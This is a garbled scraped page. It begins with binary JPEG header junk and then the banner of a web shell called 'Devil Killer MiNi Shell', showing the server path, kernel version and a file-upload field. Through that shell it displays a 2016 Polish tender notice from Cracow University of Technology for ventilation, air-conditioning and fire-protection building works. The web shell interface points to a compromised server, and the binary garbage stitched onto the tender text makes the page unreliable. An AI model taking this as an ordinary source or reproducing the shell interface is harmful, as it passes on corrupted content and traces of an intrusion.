JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161223/373220-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.pk.edu.pl' target='_blank'>http://www.pk.edu.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 373220 - 2016
              z dnia 2016-12-23 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Kraków: Instalacja wentylacji mechanicznej wraz z klimatyzacją oraz wygrodzenia pożarowe w budynku 10-35 Wydziału Inżynierii                         i Technologii Chemicznej Politechniki Krakowskiej                                   przy ul. Warszawskiej w Krakowie  w ramach zadania                             " Termomodernizacja i wymiana instalacji wewnętrznych Wydziału Inżynierii i Technologii Chemicznej, kampus                         przy ul. Warszawskiej 24 w Krakowie  etap 1 B".<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Politechnika Krakowska im. Tadeusza Kościuszki Dział Zamówień Publicznych, krajowy numer identyfikacyjny
              00000156003300, ul.
              ul. Warszawska 
              24,
              31155  
              Kraków, woj.
              małopolskie, państwo
              Polska, tel.
              12 628 26 56; 628 22 20, e-mail
              zampub@pk.edu.pl, faks
              12 6282072.
              <br />
              Adres strony internetowej (URL): www.pk.edu.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Podmiot prawa publicznego
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.pk.edu.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r.-Prawo pocztowe (Dz.U. poz. 1529 oraz z 2015 r. poz. 1830), osobiście lub za pośrednictwem posłańca<br />
                Adres:
                <br />Politechnika Krakowska Dział Zamówień Publicznych ul.warszawska 24 , 31-155 Kraków, budynek W-9, pok.110</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Instalacja wentylacji mechanicznej wraz z klimatyzacją oraz wygrodzenia pożarowe w budynku 10-35 Wydziału Inżynierii                         i Technologii Chemicznej Politechniki Krakowskiej                                   przy ul. Warszawskiej w Krakowie  w ramach zadania                             " Termomodernizacja i wymiana instalacji wewnętrznych Wydziału Inżynierii i Technologii Chemicznej, kampus                         przy ul. Warszawskiej 24 w Krakowie  etap 1 B".<br /><b>Numer referencyjny: </b>KA-2/109/2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1) Zakres robót budowlanych
Prowadzenie kanałów wentylacji w szachtach przy korytarzu (bez możliwości poziomych ich przedzieleń ppoż.), zaprojektowano poprzez wykształcenie szachtów jako odrębnej strefy pożarowej o parametrach obudowy EI 120 (wydzielonej ściankami niekonstrukcyjnymi między elementami szkieletowej konstrukcji budynku). Należy wzmocnić odporność ogniową stropów:
- płytowych, żelbetowych  w korytarzach kondygnacji nadziemnych do REI 60 
- kanałowych i płytowych  w piwnicach nad korytarzem i w pomieszczeniu węzła cieplnego do REI 120
- płytowych i Akermana nieotynkowanych  na kondygnacjach nadziemnych (głównie w hallach; zakres możliwy do precyzyjnego określenia po zdjęciu wszystkich sufitów podwieszonych) do REI 60
- płytowych fragmentów w pasach przyokiennych do REI 60
Wydzielenia klatek schodowych  wydzielenia występujące jako niekonstrukcyjne, wypełniające główną konstrukcję budynków  słupy, ściany, podciągi
Przedsionki przeciwpożarowe  wymagane przedsionki ppoż. od korytarza wykształcono na każdej kondygnacji przed klatką KL2.
Usprawnienie ewakuacji  
- wymianie drzwi wyjściowych z klatki KL2 na zewnątrz  nowe, przeszklone o konstrukcji aluminiowej  półtora skrzydłowe o szerokości w świetle 175cm, w tym szerokość skrzydła zasadniczego 120cm; wyposażenie w urządzenie antypaniczne.
- wykonaniu nowych drzwi wyjściowych z korytarza do wiatrołapu w części zachodniej poziomu parteru. Wymaga to wymiany drzwi istniejących na nowe dwuskrzydłowe, przeszklone w konstrukcji aluminiowej o szerokości w świetle 150cm i szerokości skrzydła zasadniczego100cm.
- modernizacji wewnętrznej klatki schodowej dla zwiększenia szerokości użytkowej biegów do wymaganej 120cm poprzez przebudowę balustrad i likwidację wystających cokolików (w miejscach szczególnego zawężenia),
- montażu nowych, szerszych drzwi do pomieszczeń (minimum 90cm w świetle dla drzwi jednoskrzydłowych i skrzydła głównego w drzwiach dwuskrzydłowych);
Obudowa dróg ewakuacyjnych  Obudowa korytarzy w budynku wysokim będzie zapewniona, w co najmniej w wymaganej klasie odporności ogniowej poprzez wymianę istniejących ścianek
Przebicia i obudowa kanałów wentylacyjnych  Kanały przechodzące przez strefy lub pomieszczenia, których nie obsługują należy obudować lub zabezpieczyć (obłożyć) do wymaganej odporności ogniowej.
Sufity podwieszane  W korytarzach i hallach (czyli tam, gdzie występują obecnie stare sufity podwieszone) projektuje się wymianę sufitów na nowe, które będą pełnić rolę osłony fizycznej prowadzonych powyżej instalacji i również rolę estetycznego wykończenia sufitów.
Wykończenie klatek schodowych  Na schodach zapewnić wymaganą szerokość biegów  120cm w świetle.
Pomieszczenie techniczne na dachu - wentylatornia  Rozmieszczenie potrzebnych urządzeń wentylacyjnych i klimatyzacyjnych wymaga przebudowy tego pomieszczenia polegająca na zabiegach powiększających przestrzeń potrzebną do ustawienia urządzeń i prowadzenia instalacji. Jako główne przedsięwzięcia projektuje się:
- lokalne otworzenia pomieszczenia 
- podniesienie stropodachu o 60cm
- wytworzenie trójpoziomowej możliwości prowadzenia kanałów i lokowania urządzeń
- uporządkowanie i wykończenie elewacji.
Oddzielenia pomieszczeń  
Poszczególne sale i pomieszczenia powinny być od siebie oddzielone ściankami o określonej odporności ogniowej (odpowiednio EI 60 lub EI 30), czego brakuje w pasach przyokiennych budynku wysokiego na kondygnacjach ponad parterem. 
Rozwiązania architektoniczne wykończeniowe wewnętrzne 
- Wygrodzenia zabezpieczające obszar prowadzonych prac od reszty pomieszczeń. Wykonać tymczasową konstrukcję drewnianą obłożoną płytami OSB oraz obitą folia budowlaną. Styki z podłogą, ścianami, sufitem powinny być maksymalnie uszczelnione przed dostawaniem się pyłów i kurzu poza obszar prowadzenia prac. Prace prowadzone na budynku czynnym.
- Korytarze i halle - posadzki istniejące  z naprawami uszkodzeń powstałych przy wymianie ścianek i poszerzeniach otworów na nowe drzwi  uzupełnienia analogicznymi płytkami gresowymi. Cokoliki wykonać jako nowe (na wymienianych ścianach) - z płytek gresowych cokołowych gr.10mm, wysokości 10 -12cm, z górnym sfazowaniem; powierzchnie ścian tynkowane  tynk drobnoziarnisty cementowo-wapienny kat. III + szpachlowanie. Malowanie farbami wnętrzowymi dyspersyjnymi o podwyższonych parametrach ścieralności i zmywalności. Ścianki i zestawy drzwiowe przeszklone. Szkło przejrzyste bezbarwne (w wymaganym zestawie ogniochronnym) z wizualnym oznaczeniem bezpieczeństwa występowania przegrody. W zestawach między korytarzem a przedsionkiem w części stałej montowane klapy transferowe 50/80cm.Profile aluminiowej w technologii zwykłej lub przeciwpożarowej - malowane proszkowo (proponowany kolor RAL 5014), drzwi stalowe proponowany kolor RAL 7040, w części ponad sufitami podwieszonymi wypełnienie pełne o wymaganej dla danej przegrody odporności ogniowej.
- Klatka schodowa - nawierzchnia biegów, spoczników, cokoliki, tynki ścian i podniebień istniejące  z niewielkimi naprawami po remoncie balustrad oraz czyszczeniem. Nowe malowanie farbami wnętrzowymi dyspersyjnymi o podwyższonych parametrach ścieralności i zmywalności. Modernizacja balustrad z wykorzystaniem istniejącej metalowej konstrukcji prętowej. Nowe pochwyty z drewna twardego liściastego malowanego lakierem transparentnym, nowe wypełnienia metalowe prętowe zabezpieczone antykorozyjnie; elementy metalowe malowane podwójnie farbami poliwinylowymi w kolorze ciemny grafit.
- Nadbudówka i dach. - wykończenia zewnętrzne - uzupełnienie docieplenia i tynk cienkowarstwowy mineralny malowany farbami silikonowymi, zachowana istniejąca stolarka okienna i elementy aluzyjne ponad oknami; dodatkowo wstawione we wnękach w ociepleniu elementy dekoracyjne w postaci żaluzji o wyglądzie zbliżonym do istniejących; - wykończenie wewnętrzne (ściany i sufit) - tynk cementowo-wapienny i malowanie farbami dyspersyjnymi elewacyjnymi; ruszt stalowy (krata pomostowa typowa)  po zabezpieczeniu antykorozyjnym malowanie potrójne farbami poliwinylowymi zewnętrznego stosowania; obróbki blacharskie i orynnowania z blachy stalowej ocynkowanej, posadzka wylewana techniczna żywicznobetonowa, mrozoodporna, stolarka drzwiowa stalowa typu zewnętrznego (w tym w części o określonej odporności ogniowej - według rzutów); stolarka okienna istniejąca.
Rozwiązania architektoniczne wykończeniowe elewacyjne  Elewacje pozostają w zasadzie bez zmian. Korekty będą niewielkie, nie naruszające podstawowych, obecnie występujących zasad ukształtowania wyglądu.
Uszczegółowienie stolarki i ślusarki  Uwaga! Wymiary ślusarki należy przed jej wykonaniem obmierzyć z natury  po wykonaniu robót rozbiórkowych i nowych murowych oraz rozprowadzeniu podstawowych ciągów instalacyjnych (przede wszystkim wentylacyjnych).
-Ślusarka stalowa wewnętrzna, w odporności ogniowej EI 30 i EI 60. Drzwi pełne, profilowe, stalowe, wewnątrzlokalowe o odporności ogniowej, wykonane w atestowanym systemie, szklone zestawem przeciwpożarowym o wymaganej dla drzwi klasie odporności EI 30 lub EI 60. Drzwi wyposażone w samozamykacze. Łączenia ślusarki z elementami budowlanymi zgodnie z klasyfikacja ogniową. Kolorystyka jasnoszara wg RAL 7040.
-Ślusarka aluminiowa wewnętrzna, w odporności ogniowej EI 30 i EI 60. Ślusarka drzwiowa oraz ścianki wykonane w systemie profili aluminiowych izolowanych przeciwpożarowo (za podstawę przyjąć cechy konstrukcyjne rozwiązań systemowych wraz z akcesoriami wg aktualnej dokumentacji technicznej wybranej firmy). Dobór profili nastąpi na podstawie obliczeń statycznych przez wykonawcę robót po ostatecznym wyborze systemu ślusarki. Kolorystyka ślusarki aluminiowej  szaroniebieska wg RAL 5014 - dopasowanego do istniejącej w KL 2. Drzwi wyposażone w samozamykacze.
-Ślusarka stalowa, zwykła pełna. Drzwi stalowe, wewnątrzlokalowe, rozwieralne, jedno i dwuskrzydłowe, gładkie, jedno i dwuskrzydłowe. Drzwi wykonane indywidualnie. Kolorystyka jasnoszara wg RAL 7040. Drzwi wyposażone w samozamykacze.
- Okna i drzwi zewnętrzne  o wymaganej odporności ogniowej EI 60. Ślusarka okienna i drzwiowa wykonana w systemie profili stalowych izolowanych termicznie (za podstawę przyjąć cechy konstrukcyjne rozwiązań systemowych wg aktualnej dokumentacji technicznej wybranego systemu), Wymagane parametry dla przegród zewnętrznych: izolacyjność termiczna zestawu (ramy + szklenie) U  1,8 W/m2K, zalecane U = 1,4W/m2K). Kolorystyka zewnętrznej ślusarki stalowej - biała wg RAL dopasowanego do istniejącej i niedawno wymienianej, sąsiadującej stolarki.
Drzwi wewnętrzne bez odporności pożarowej  parametry wybranego Producenta/Dostawcy - stolarka drzwiowa drewniana (drzwi z korytarza do sal i pomieszczeń o izolacyjności akustycznej R|A! minimum 25dB, zalecane 30 dB)  skrzydła pełne, gładkie przylgowe; okleinowanie gr. 0,9mm HPL, wypełnienie warstwowe z pełnych płyt wiórowych, rama drewniana (z sezonowanego drewna np. mahoniowego), ościeżnice obejmujące MDF lub drewniane pełne (w indywidualnych przypadkach możliwe stalowe - stal gr. 1,5mm ocynkowana dyfuzyjnie lub masywne drewniane). Opaski dwustronne przy osadzeniu w ściankach grubości do 25cm, w ściankach grubszych opaski jednostronne + ćwierćwałek. Kolorystyka proponowana  jasny buk lub jasny dąb.

2) Zakres robót konstrukcyjnych.
Piwnica
- Wykonanie w ścianach istn. oraz w stropie otw. dla potrzeb proj. branży sanitarnej.
- Wykonanie pionowych i poziomych obudów proj. kanałów według projektu architektonicznego.
- Wykonanie konstrukcji wsporczych pod urządzenia instalacyjne.
- Wykonanie w istniejącej klatce schodowej konstrukcji wsporczej KM1 dla potrzeb proj. Instalacyjnego.
Parter
- Wykonanie w ścianach istn. oraz w stropie otw. dla potrzeb proj. branży sanitarnej.
- Wyburzenie ścian korytarza.
- Wykonanie nowoprojektowanych ścian oraz wydzieleń p.poż. wg. projektu architektonicznego.
- Wykonanie pionowych i poziomych obudów proj. kanałów według projektu architektonicznego.
- Wykonanie w istniejącej klatce schodowej konstrukcji wsporczej KM1 dla potrzeb proj. branży sanitarnej.
I Piętro
- Wykonanie w ścianach istn. oraz w stropie otw. dla potrzeb proj. branży sanitarnej.
- Wyburzenie ścian korytarza.
- Wykonanie nowoprojektowanych ścian oraz wydzieleń p.poż. wg. projektu architektonicznego.
- Wykonanie pionowych i poziomych obudów proj. kanałów według projektu architektonicznego.
- Wykonanie w istniejącej klatce schodowej konstrukcji wsporczej KM1 dla potrzeb proj. branży sanitarnej.
II Piętro
- Wykonanie w ścianach istn. oraz w stropie otw. dla potrzeb proj. branży sanitarnej.
- Wyburzenie ścian korytarza.
- Wykonanie nowoprojektowanych ścian oraz wydzieleń p.poż. wg. projektu architektonicznego.
- Wykonanie pionowych i poziomych obudów proj. kanałów według projektu architektonicznego.
- Wykonanie w istniejącej klatce schodowej konstrukcji wsporczej KM1 dla potrzeb proj. branży sanitarnej.
III Piętro
- Wykonanie w ścianach istn. oraz w stropie otw. dla potrzeb proj. branży sanitarnej.
- Wyburzenie ścian korytarza.
- Wykonanie nowoprojektowanych ścian oraz wydzieleń p.poż. wg. projektu architektonicznego.
- Wykonanie pionowych i poziomych obudów proj. kanałów według projektu architektonicznego.
- Wykonanie w istniejącej klatce schodowej konstrukcji wsporczej KM1 dla potrzeb proj. branży sanitarnej.
IV Piętro
- Wykonanie w ścianach istn. oraz w stropie otw. dla potrzeb proj. branży sanitarnej.
- Wyburzenie ścian korytarza.
- Wykonanie nowoprojektowanych ścian oraz wydzieleń p.poż. wg. projektu architektonicznego.
- Wykonanie pionowych i poziomych obudów proj. kanałów według projektu architektonicznego.
- Wykonanie w istniejącej klatce schodowej konstrukcji wsporczej KM1 dla potrzeb proj. branży sanitarnej.
V Piętro
- Wykonanie w ścianach istn. oraz w stropie otw. dla potrzeb proj. branży sanitarnej.
- Wyburzenie ścian korytarza.
- Wykonanie nowoprojektowanych ścian oraz wydzieleń p.poż. wg. projektu architektonicznego.
- Wykonanie pionowych i poziomych obudów proj. kanałów według projektu architektonicznego.
- Wykonanie w istniejącej klatce schodowej konstrukcji wsporczej KM1 dla potrzeb proj. branży sanitarnej.
VI Piętro
- Wykonanie w ścianach istn. oraz w stropie otw. dla potrzeb proj. branży sanitarnej.
- Wyburzenie ścian korytarza i stropu do przestrzeni technicznej.
- Wykonanie nowoprojektowanych ścian oraz wydzieleń p.poż. wg. projektu architektonicznego.
- Wykonanie pionowych i poziomych obudów proj. kanałów według projektu architektonicznego.
- Wykonanie w istniejącej klatce schodowej konstrukcji wsporczej KM1 dla potrzeb proj. branży sanitarnej.
- Wykonanie sufitu podwieszanego wg proj. architektury.
Dach część niska
- Wykonanie konstrukcji wsporczych pod urządzenia instalacyjne.
- Wykonanie schodków przełazowych przez kanały SCH6.
Dach część wysoka
- Wykonanie w stropie otw. dla potrzeb proj. branży sanitarnej.
- Wykonanie obudowy kanału K4,
- Wykonanie schodków SCH1 do pomostu technicznego.
Nadbudówka
- Wyburzenie części ścian nadbudówki.
- Wyburzenie sufitu powieszanego.
- Wyburzenie stropodachu nadbudówki.
- Wykonanie pomostu technicznego dla potrzeb proj. branży sanitarnej.
- Wykonanie otworów w stropie przestrzeni technicznej (podłoga nadbudówki).
- Nadmurowanie ścian nadbudówki.
- Wykonanie nadproży i wieńców żelbetowych.
- Wykonanie nowoprojektowanego stropodachu nadbudówki.

3) Zakres robót instalacji wentylacji.
Podczas realizacji etapu I część B  rok 2014 obejmującego budynek wysoki Wydziału Inżynierii i Technologii Chemicznej Politechniki Krakowskiej w osiach 1 do 7 (dokładny zakres podziału etapu pokazano na rzutach poszczególnych kondygnacji) poza:
- pomieszczeniami przychodni lekarskiej
- pomieszczeniami magazynowymi i archiwum zlokalizowanym w piwnicy
- halą półtechniki wraz z pomieszczeniami przyległymi,
Przyjęte rozwiązania projektowe dla realizacji etapu I część B  rok 2014, zakładają podział na następujące układy wentylacyjne:
- układ wentylacyjny nawiewny N8 obsługujący pomieszczenia zlokalizowane o kondygnacji piętra IV do kondygnacji piętra VI włącznie, w obszarze budynku wysokiego w osiach 1 do 7; centrala wentylacyjna nawiewna zlokalizowana będzie na dachu budynku wysokiego.
- układ wentylacyjny wywiewny W8 obsługujący pomieszczenia zlokalizowane od kondygnacji piętra IV do kondygnacji piętra VI włącznie, w obszarze budynku wysokiego w osiach 1do 7; centrala wentylacyjna wywiewna zlokalizowana będzie na dachu budynku wysokiego.
- układ wentylacyjny nawiewno-wywiewny N3-W3 nawiewający powietrze uzdatnione do pomieszczeń zlokalizowanych od kondygnacji parteru do kondygnacji piętra III włącznie, w obszarze budynku wysokiego w osiach 1 do 7, oraz wyciągające powietrze zużyte z tych pomieszczeń; centrala wentylacyjna nawiewno-wywiewna zlokalizowana będzie na dachu budynku części niższej,
- układ wyciągowy z dygestoriów DG4. Centralę wentylacyjną wywiewną DG4 zlokalizowano na dachu budynku części wysokiej.

4) Zakres robót instalacji klimatyzacji.
W zakres wchodzą następujące instalacje chłodnicze:
- instalacja klimatyzacji komfortu w wybranych przez Inwestora pomieszczeniach, realizowana w oparciu o klimatyzatory pracujące z pojedyńczą jednostką zewnętrzną w układzie AG2,
- instalacje chłodnicze freonowe dla chłodnicy freonowej zamontowanej w centrali wentylacyjnej N3-W3 zlokalizowanej na dachu budynku niskiego obsługującej pomieszczenia 	w wysokiej części budynku. W zakres projektu wchodzi równie  instalacja odprowadzenia skroplin od klimatyzatorów układu AG2.

5) Zakres robót instalacji c.t.
Instalacje ciepła technologicznego: Etap I część B  rok 2014 zapewniają ogrzewanie powietrza wentylacyjnego nawiewanego w okresie zimy do pomieszczeń na wszystkich kondygnacjach budynku wysokiego w osiach od 1 do 7. W zakres realizacji Etapu I część B  rok 2014 wchodzi także instalacja ogrzewania pomieszczeń zlokalizowanych w nadbudowie na dachu budynku w osiach od 1 do 7. Powyższe opracowanie zawiera również instalację doprowadzenia zimnej wody na cele serwisowe do pomieszczeń technicznych zlokalizowanych na poddaszu wysokiej części budynku.

6) Zakres robót instalacji w.l.

7) Zakres robót instalacji elektrycznych.
	rozdzielnice główne wentylacji RGW i szafy automatyki SA
	montaż AKPiA układów wentylacji i klimatyzacji oraz układów technologicznych ciepła technologicznego, wody lodowej i odzysku ciepła
	instalacje okablowania AKPiA ww instalacji
	instalacja siłowa do urządzeń wentylacji i klimatyzacji oraz układów technologicznych
	rozdzielnie wentylacyjne piętrowe RWV
	instalacje okablowania układów klimatyzacji VRV
	tablice elektryczne do zasilania regulatorów zmiennego przepływu TE-D
	Instalacje okablowania układów regulacji zmiennego przepływu VAV
	oświetlenie podstawowe wentylatorni
	oświetlenie awaryjne, ewakuacyjne wentylatorni
	instalacja siłowa 400V, 230V do zestawów gniazd serwisowych wentylatorni
	system BMS sterowania wentylacją i klimatyzacją
